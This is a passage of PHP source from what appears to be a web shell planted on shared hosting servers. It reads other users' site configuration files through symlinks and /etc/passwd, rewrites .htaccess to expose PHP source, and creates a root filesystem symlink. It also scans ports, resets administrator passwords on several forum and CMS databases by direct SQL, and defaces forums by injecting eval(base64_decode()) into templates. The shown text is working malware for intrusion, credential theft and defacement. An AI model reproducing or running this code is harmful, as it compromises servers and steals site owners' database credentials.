2617 {
2618 $s = fgets($file);
2619 $matches = array();
2620 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2621 $matches = str_replace("home/","",$matches[1]);
2622 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2623 $headers=get_headers($hs_status);
2624 if(strpos($headers[0],'200') == true )
2625 $hs_script = "Wordpress";
2626 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2627 $headers=get_headers($hs_status);
2628 if(strpos($headers[0],'200') == true )
2629 $hs_script = "Wordpress";
2630 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2631 $headers=get_headers($hs_status);
2632 if(strpos($headers[0],'200') == true )
2633 $hs_script = "Joomla";
2634 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2635 $headers=get_headers($hs_status);
2636 if(strpos($headers[0],'200') == true )
2637 $hs_script = "Vbulletin";
2638 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2639 $headers=get_headers($hs_status);
2640 if(strpos($headers[0],'200') == true )
2641 $hs_script = "Vbulletin";
2642 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2643 $headers=get_headers($hs_status);
2644 if(strpos($headers[0],'200') == true )
2645 $hs_script = "Mybb";
2646 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2647 $headers=get_headers($hs_status);
2648 if(strpos($headers[0],'200') == true )
2649 $hs_script = "IPB";
2650 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2651 $headers=get_headers($hs_status);
2652 if(strpos($headers[0],'200') == true )
2653 $hs_script = "SMF";
2654 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2655 $headers=get_headers($hs_status);
2656 if(strpos($headers[0],'200') == true )
2657 $hs_script = "WHMCS";
2658 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2659 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2660 $dcount++;
2661 }
2662 fclose($file);
2663 echo "</table>";
2664 unlink("test.txt");
2665 }
2666 }
2667 }
2668 }
2669 else
2670 echo "<center>Cannot Get Scripts</center>";
2671}
2672elseif(isset($_REQUEST["scphp"]))
2673{
2674 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('phpmanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
2675 <td><a href=javascript:void(0) onClick="getdata('phpscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
2676 </tr></table></center><?php
2677}
2678else if(isset($_REQUEST['phpmanuallyscript']))
2679{
2680 ?>
2681 <center>
2682 <form action="<?php echo $self; ?>" method="post">
2683 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2684 <input type="button" OnClick="manuallyscriptfn('phpscriptlocator',passwd.value)" value="Get Config" class="but">
2685 </form>
2686 </center>
2687 <?php
2688}
2689else if(isset($_REQUEST['phpscriptlocator']))
2690{
2691 if($os == "Linux")
2692 {
2693 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2694 $path=explode('/',$url);
2695 $url =str_replace($path[count($path)-1],'',$url);
2696 function syml($usern,$pdomain)
2697 {
2698 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
2699 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
2700 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
2701 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
2702 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
2703 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
2704 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
2705 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
2706 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
2707 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
2708 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
2709 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
2710 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
2711 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
2712 symlink('/home/'.$usern.'/public_html/bb-config.php',$pdomain.'~~boxbilling.txt');
2713 symlink('/home/'.$usern.'/public_html/billing/bb-config.php',$pdomain.'~~boxbilling.txt');
2714 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
2715 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
2716 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
2717 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
2718 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
2719 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
2720 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
2721 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
2722 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
2723 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
2724 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
2725 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
2726 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
2727 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
2728 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
2729 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
2730 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
2731 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
2732 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
2733 }
2734 if(isset($_REQUEST['passwd']))
2735 {
2736 $getetc = trim($_REQUEST['passwd']);
2737
2738 mkdir("dhanushSPT");
2739 chdir("dhanushSPT");
2740 $file3 = 'Options all
2741 DirectoryIndex Sux.html
2742 AddType text/plain .php
2743 AddHandler server-parsed .php
2744 AddType text/plain .html
2745 AddHandler txt .html
2746 Require None
2747 Satisfy Any
2748 ';
2749 $fp3 = fopen('.htaccess','w');
2750 $fw3 = fwrite($fp3,$file3);
2751 @fclose($fp3);
2752 $myfile = fopen("test.txt","w");
2753 fputs($myfile,$getetc);
2754 fclose($myfile);
2755
2756 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2757 while(!feof($file))
2758 {
2759 $s = fgets($file);
2760 $matches = array();
2761 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2762 $matches = str_replace("home/","",$matches[1]);
2763 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2764 continue;
2765 syml($matches,$matches);
2766 }
2767 fclose($file);
2768 unlink("test.txt");
2769 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2770 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2771
2772 }
2773 else
2774 {
2775 $d0mains = @file("/etc/named.conf");
2776 if($d0mains)
2777 {
2778 mkdir("dhanushST");
2779 chdir("dhanushST");
2780 $file3 = 'Options all
2781 DirectoryIndex Sux.html
2782 AddType text/plain .php
2783 AddHandler server-parsed .php
2784 AddType text/plain .html
2785 AddHandler txt .html
2786 Require None
2787 Satisfy Any
2788 ';
2789 $fp3 = fopen('.htaccess','w');
2790 $fw3 = fwrite($fp3,$file3);
2791 @fclose($fp3);
2792 foreach($d0mains as $d0main)
2793 {
2794 if(eregi("zone",$d0main))
2795 {
2796 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2797 flush();
2798
2799 if(strlen(trim($domains[1][0])) > 2)
2800 {
2801 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2802
2803 syml($user['name'],$domains[1][0]);
2804 }
2805 }
2806 }
2807 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2808 echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2809 }
2810 else
2811 {
2812 mkdir("dhanushSPT");
2813 chdir("dhanushSPT");
2814 $file3 = 'Options all
2815 DirectoryIndex Sux.html
2816 AddType text/plain .php
2817 AddHandler server-parsed .php
2818 AddType text/plain .html
2819 AddHandler txt .html
2820 Require None
2821 Satisfy Any
2822 ';
2823 $fp3 = fopen('.htaccess','w');
2824 $fw3 = fwrite($fp3,$file3);
2825 @fclose($fp3);
2826 $temp = "";
2827 $val1 = 0;
2828 $val2 = 1000;
2829 for(;$val1 <= $val2;$val1++)
2830 {
2831 $uid = @posix_getpwuid($val1);
2832 if ($uid)
2833 $temp .= join(':',$uid)."\n";
2834 }
2835 echo '<br/>';
2836 $temp = trim($temp);
2837
2838 $file5 = fopen("test.txt","w");
2839 fputs($file5,$temp);
2840 fclose($file5);
2841
2842
2843 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2844 while(!feof($file))
2845 {
2846 $s = fgets($file);
2847 $matches = array();
2848 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2849 $matches = str_replace("home/","",$matches[1]);
2850 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2851 continue;
2852 syml($matches,$matches);
2853 }
2854 fclose($file);
2855 echo "</table>";
2856 unlink("test.txt");
2857 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2858 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2859 }
2860 }
2861 }
2862 else
2863 echo "<center>Cannot Complete the task!!!!</center>";
2864
2865}
2866else if(isset($_GET["perlsymlink"]))
2867{
2868 @mkdir("dhanush",0777);
2869 @chdir("dhanush");
2870 $dhanushsym = gzuncompress(base64_decode($plsym));
2871 $fp3 = fopen('dhanushsym.pl','w');
2872 $fw3 = fwrite($fp3,$dhanushsym);
2873 @fclose($fp3);
2874 chmod("dhanushsym.pl", 0755);
2875 ?><center><iframe src="dhanush/dhanushsym.pl" height="400" width="600"></iframe></center><?php
2876}
2877else if(isset($_GET["symlinkfile"]))
2878{
2879 if(!isset($_GET['file']))
2880 {
2881 ?>
2882 <center>
2883 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
2884 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
2885 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
2886 </form></center>
2887 <br><br>
2888 <?php
2889 }
2890}
2891else if(isset($_GET['symlinkmyfile']))
2892{
2893 if($os == "Linux")
2894 {
2895 $fakedir="cx";
2896 $fakedep=16;
2897
2898 $num=0; // offset of symlink.$num
2899
2900 if(!empty($_GET['myfile']))
2901 $file=$_GET['myfile'];
2902 else $file="";
2903
2904 if(empty($file))
2905 exit;
2906
2907 if(!is_writable("."))
2908 echo "not writable directory";
2909
2910 $level=0;
2911
2912 for($as=0;$as<$fakedep;$as++)
2913 {
2914 if(!file_exists($fakedir))
2915 mkdir($fakedir);
2916 chdir($fakedir);
2917 }
2918
2919 while(1<$as--) chdir("..");
2920
2921 $hardstyle = explode("/", $file);
2922
2923 for($a=0;$a<count($hardstyle);$a++)
2924 {
2925 if(!empty($hardstyle[$a]))
2926 {
2927 if(!file_exists($hardstyle[$a]))
2928 mkdir($hardstyle[$a]);
2929 chdir($hardstyle[$a]);
2930 $as++;
2931 }
2932 }
2933 $as++;
2934 while($as--)
2935 chdir("..");
2936
2937 @rmdir("fakesymlink");
2938 @unlink("fakesymlink");
2939
2940 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
2941
2942 while(1)
2943 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
2944 else $num++;
2945
2946 @unlink("fakesymlink");
2947 mkdir("fakesymlink");
2948
2949 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
2950 }
2951 else
2952 echo '<CENTER>Cannot Create Symlink</CENTER>';
2953}
2954else if(isset($_POST['cpaneluser']))
2955{
2956 if(is_numeric($_POST['noofsubdomain']))
2957 {
2958 for($i=1;$i<=$_POST['noofsubdomain'];$i++)
2959 {
2960 $subDomain = randomt();
2961 echo make_subdomain($subDomain,$_POST['cpaneluser'],$_POST['cpanelpass'],$_POST['subindex']);
2962 }
2963 }
2964 else
2965 echo "Insert number";
2966}
2967else if(isset($_REQUEST['404new']))
2968{
2969 ?>
2970 <form>
2971 <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
2972 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
2973 </br>
2974 </form>
2975 <?php
2976}
2977else if(isset($_REQUEST['404page']))
2978{
2979 $url = $_SERVER['REQUEST_URI'];
2980 $path=explode('/',$url);
2981 $url =str_replace($path[count($path)-1],'',$url);
2982 if(isset($_POST['message']))
2983 {
2984 if($myfile = fopen(".htaccess", "a"))
2985 {
2986 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
2987 if($myfilee = fopen("404.html", "w+"))
2988 {
2989 fwrite($myfilee, $_POST['message']);
2990 }
2991 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
2992 }
2993 else
2994 echo "<center>Cannot Set 404 Page</center>";
2995 }
2996 else if(strlen($ind) != 0)
2997 {
2998 if($myfile = fopen(".htaccess", "a"))
2999 {
3000 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
3001
3002 if($myfilee = fopen("404.html", "w+"))
3003 {
3004 fwrite($myfilee, base64_decode($ind));
3005
3006 fclose($myfilee);
3007 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
3008 }
3009 fclose($myfile);
3010 }
3011 else
3012 {
3013 echo "<center>Cannot Set 404 Page</center>";
3014 }
3015 }
3016 else
3017 echo "<center>Nothing Specified in the shell</center>";
3018}
3019else if(isset($_GET["symlink"]))
3020{
3021 $d0mains = @file("/etc/named.conf");
3022 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
3023 $path=explode('/',$url);
3024 $url =str_replace($path[count($path)-1],'',$url);
3025 if($d0mains)
3026 {
3027 @mkdir("dhanush",0777);
3028 @chdir("dhanush");
3029 execmd("ln -s / root");
3030
3031 $file3 = 'Options all
3032 DirectoryIndex Sux.html
3033 AddType text/plain .php
3034 AddHandler server-parsed .php
3035 AddType text/plain .html
3036 AddHandler txt .html
3037 Require None
3038 Satisfy Any
3039 ';
3040 $fp3 = fopen('.htaccess','w');
3041 $fw3 = fwrite($fp3,$file3);
3042 @fclose($fp3);
3043
3044 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
3045
3046 $dcount = 1;
3047 foreach($d0mains as $d0main)
3048 {
3049 if(eregi("zone",$d0main))
3050 {
3051 preg_match_all('#zone "(.*)"#', $d0main, $domains);
3052 flush();
3053
3054 if(strlen(trim($domains[1][0])) > 2)
3055 {
3056 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
3057
3058 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
3059 $dcount++;
3060 }
3061 }
3062
3063 }
3064 echo "</table>";
3065 }
3066 else
3067 {
3068 if($os == "Linux")
3069 {
3070 ?>
3071 <div style="float:left;position:fixed;">
3072 <form>
3073 <table cellpadding="9">
3074 <tr>
3075 <th colspan="2">Get User Name</th>
3076 </tr>
3077 <tr>
3078 <td>Enter Website Name :</td>
3079 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
3080 </tr>
3081 <tr>
3082 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
3083 </tr>
3084 <tr>
3085 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
3086 </tr>
3087 </table>
3088 </form>
3089 </div>
3090 <?php
3091 $TEST=@file('/etc/passwd');
3092 if ($TEST)
3093 {
3094 @mkdir("dhanush",0777);
3095 @chdir("dhanush");
3096 execmd("ln -s /root");
3097
3098$file3 = 'Options all
3099 DirectoryIndex Sux.html
3100 AddType text/plain .php
3101 AddHandler server-parsed .php
3102 AddType text/plain .html
3103 AddHandler txt .html
3104 Require None
3105 Satisfy Any
3106 ';
3107 $fp3 = fopen('.htaccess','w');
3108 $fw3 = fwrite($fp3,$file3);
3109 @fclose($fp3);
3110
3111 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
3112
3113
3114 $dcount = 1;
3115 $file = fopen("/etc/passwd", "r");
3116 //Output a line of the file until the end is reached
3117 while(!feof($file))
3118 {
3119 $s = fgets($file);
3120 $matches = array();
3121 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3122 $matches = str_replace("home/","",$matches[1]);
3123 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3124 continue;
3125 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
3126 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
3127 $dcount++;
3128 }
3129 fclose($file);
3130
3131 echo "</table>";
3132 }
3133 else
3134 {
3135 @mkdir("dhanush",0777);
3136 @chdir("dhanush");
3137 execmd("ln -s / root");
3138 $file3 = 'Options all
3139 DirectoryIndex Sux.html
3140 AddType text/plain .php
3141 AddHandler server-parsed .php
3142 AddType text/plain .html
3143 AddHandler txt .html
3144 Require None
3145 Satisfy Any
3146 ';
3147 $fp3 = fopen('.htaccess','w');
3148 $fw3 = fwrite($fp3,$file3);
3149 @fclose($fp3);
3150
3151 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
3152
3153 $temp = "";
3154 $val1 = 0;
3155 $val2 = 1000;
3156 for(;$val1 <= $val2;$val1++)
3157 {
3158 $uid = @posix_getpwuid($val1);
3159 if ($uid)
3160 $temp .= join(':',$uid)."\n";
3161 }
3162 echo '<br/>';
3163 $temp = trim($temp);
3164
3165 $file5 = fopen("test.txt","w");
3166 fputs($file5,$temp);
3167 fclose($file5);
3168
3169 $dcount = 1;
3170 $file = fopen("test.txt", "r");
3171 while(!feof($file))
3172 {
3173 $s = fgets($file);
3174 $matches = array();
3175 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3176 $matches = str_replace("home/","",$matches[1]);
3177 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3178 continue;
3179 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
3180 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
3181 $dcount++;
3182 }
3183 fclose($file);
3184 echo "</table>";
3185 unlink("test.txt");
3186 }
3187 }
3188 else
3189 echo "<center><font size=4 >Cannot create Symlink</font></center>";
3190 }
3191}
3192else if(isset($_GET['host']) && isset($_GET['protocol']))
3193{
3194 echo "Open Ports: ";
3195 $host = $_GET['host'];
3196 $proto = $_GET['protocol'];
3197 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
3198 for($current = 0; $current <= 23; $current++)
3199 {
3200 $currents = $myports[$current];
3201 $service = getservbyport($currents, $proto);
3202 // Try to connect to port
3203 $result = fsockopen($host, $currents, $errno, $errstr, 1);
3204 // Show results
3205 if($result)
3206 echo "<font class=txt>$currents, </font>";
3207 }
3208}
3209else if(isset($_REQUEST['forumpass']))
3210{
3211 $localhost = $_GET['f1'];
3212 $database = $_GET['f2'];
3213 $username = $_GET['f3'];
3214 $password = $_GET['f4'];
3215 $prefix = $_GET['prefix'];
3216 $newpass = $_GET['newpass'];
3217 $uid = $_GET['uid'];
3218
3219 if($_GET['forums'] == "vb")
3220 {
3221 $newpass = $_GET['newipbpass'];
3222 $uid = $_GET['ipbuid'];
3223 $con = mysql_connect($localhost,$username,$password);
3224 $db = mysql_select_db($database,$con);
3225 $salt = "eghjghrtd";
3226 $newpassword = md5(md5($newpass) . $salt);
3227 if($prefix == "" || $prefix == null)
3228 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
3229 else
3230 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
3231 if($sql)
3232 {
3233 mysql_close($con);
3234 echo "<font class=txt>Password Changed Successfully</font>";
3235 }
3236 else
3237 echo "Cannot Change Password";
3238 }
3239 else if($_GET['forums'] == "mybb")
3240 {
3241 $newpass = $_GET['newipbpass'];
3242 $uid = $_GET['ipbuid'];
3243 $con = mysql_connect($localhost,$username,$password);
3244 $db = mysql_select_db($database,$con);
3245 $salt = "jeghj";
3246 $newpassword = md5(md5($salt).md5($newpass));
3247 if($prefix == "" || $prefix == null)
3248 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
3249 else
3250 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
3251 if($sql)
3252 {
3253 mysql_close($con);
3254 echo "<font class=txt>Password Changed Successfully</font>";
3255 }
3256 else
3257 echo "Cannot Change Password";
3258 }
3259 else if($_GET['forums'] == "smf")
3260 {
3261 $newpass = $_GET['newipbpass'];
3262 $uid = $_GET['ipbuid'];
3263 $con = mysql_connect($localhost,$username,$password);
3264 $db = mysql_select_db($database,$con);
3265
3266 if($prefix == "" || $prefix == null)
3267 {
3268 $result = mysql_query("select member_name from smf_members where id_member = $uid");
3269 $row = mysql_fetch_array($result);
3270 $membername = $row['member_name'];
3271 $newpassword = sha1(strtolower($membername).$newpass);
3272 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
3273 }
3274 else
3275
3276 {
3277 $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
3278 $row = mysql_fetch_array($result);
3279 $membername = $row['member_name'];
3280 $newpassword = sha1(strtolower($membername).$newpass);
3281 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
3282 }
3283 if($sql)
3284 {
3285 mysql_close($con);
3286 echo "<font class=txt>Password Changed Successfully</font>";
3287 }
3288 else
3289 echo "Cannot Change Password";
3290 }
3291 else if($_GET['forums'] == "phpbb")
3292 {
3293 $newpass = $_POST['newipbpass'];
3294 $uid = $_POST['ipbuid'];
3295 $con = mysql_connect($localhost,$username,$password);
3296 $db = mysql_select_db($database,$con);
3297
3298 $newpassword = md5($newpass);
3299 if(empty($prefix) || $prefix == null)
3300 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
3301 else
3302 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
3303 if($sql)
3304 {
3305 mysql_close($con);
3306 echo "<font class=txt>Password Changed Successfully</font>";
3307 }
3308 else
3309 echo "Cannot Change Password";
3310 }
3311 else if($_GET['forums'] == "ipb")
3312 {
3313 $newpass = $_POST['newipbpass'];
3314 $uid = $_POST['ipbuid'];
3315 $con = mysql_connect($localhost,$username,$password);
3316 $db = mysql_select_db($database,$con);
3317 $salt = "eghj";
3318 $newpassword = md5(md5($salt).md5($newpass));
3319 if($prefix == "" || $prefix == null)
3320 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
3321 else
3322 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
3323 if($sql)
3324 {
3325 mysql_close($con);
3326 echo "<font class=txt>Password Changed Successfully</font>";
3327 }
3328 else
3329 echo "Cannot Change Password";
3330 }
3331 else if($_GET['forums'] == "wp")
3332 {
3333 $uname = $_GET['uname'];
3334 $con = mysql_connect($localhost,$username,$password);
3335 $db = mysql_select_db($database,$con);
3336
3337 $newpassword = md5($newpass);
3338 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname'");
3339 if($sql)
3340 {
3341 mysql_close($con);
3342 echo "<font class=txt>Password Changed Successfully</font>";
3343 }
3344 else
3345 echo "Cannot Change Password";
3346 }
3347 else if($_GET['forums'] == "joomla")
3348 {
3349 $newjoomlapass = $_GET['newjoomlapass'];
3350 $joomlauname = $_GET['username'];
3351 $con = mysql_connect($localhost,$username,$password);
3352 $db = mysql_select_db($database,$con);
3353
3354 $newpassword = md5($newjoomlapass);
3355 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname'");
3356 if($sql)
3357 {
3358 mysql_close($con);
3359 echo "<font class=txt>Password Changed Successfully</font>";
3360 }
3361 else
3362 echo "Cannot Change Password";
3363 }
3364}
3365else if(isset($_POST['forumdeface']))
3366{
3367 $localhost = $_POST['f1'];
3368 $database = $_POST['f2'];
3369 $username = $_POST['f3'];
3370 $password = $_POST['f4'];
3371 $index = $_POST['index'];
3372 $prefix = $_POST['tableprefix'];
3373
3374 if($_POST['forumdeface'] == "vb")
3375 {
3376 $con =@ mysql_connect($localhost,$username,$password);
3377 $db =@ mysql_select_db($database,$con);
3378 $index=str_replace('"','\\"',$index);
3379 $attack = "{\${eval(base64_decode(\'";
3380 $attack .= base64_encode("echo \"$index\";");
3381 $attack .= "\'))}}{\${exit()}}</textarea>";
3382 if($prefix == "" || $prefix == null)
3383 $query = "UPDATE template SET template = '$attack'";
3384 else
3385 $query = "UPDATE ".$prefix."template SET template = '$attack'";
3386 $result =@ mysql_query($query,$con);
3387 if($result)
3388 echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
3389 else
3390 echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
3391 }
3392 else if($_POST['forumdeface'] == "mybb")
3393 {
3394 $con =@ mysql_connect($localhost,$username,$password);
3395 $db =@ mysql_select_db($database,$con);
3396 $attack = "{\${eval(base64_decode(\'";
3397 $attack .= base64_encode("echo \"$index\";");
3398 $attack .= "\'))}}{\${exit()}}</textarea>";
3399 $attack = str_replace('"',"\\'",$attack);
3400
3401 if($prefix == "" || $prefix == null)
3402 $query = "UPDATE mybb_templates SET template = '$attack'";
3403 else
3404 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
3405 $result =@ mysql_query($query,$con);
3406 if($result)
3407 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
3408 else
3409 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
3410 }
3411 else if($_POST['forumdeface'] == "smf")
3412 {
3413 $head = $_POST['head'];
3414 $catid = $_POST['f5'];
3415
3416 $con =@ mysql_connect($localhost,$username,$password);
3417 $db =@ mysql_select_db($database,$con);
3418 if($prefix == "" || $prefix == null)
3419 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3420 else
3421 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3422 $result =@ mysql_query($query,$con);
3423 if($result)
3424 echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
3425 else
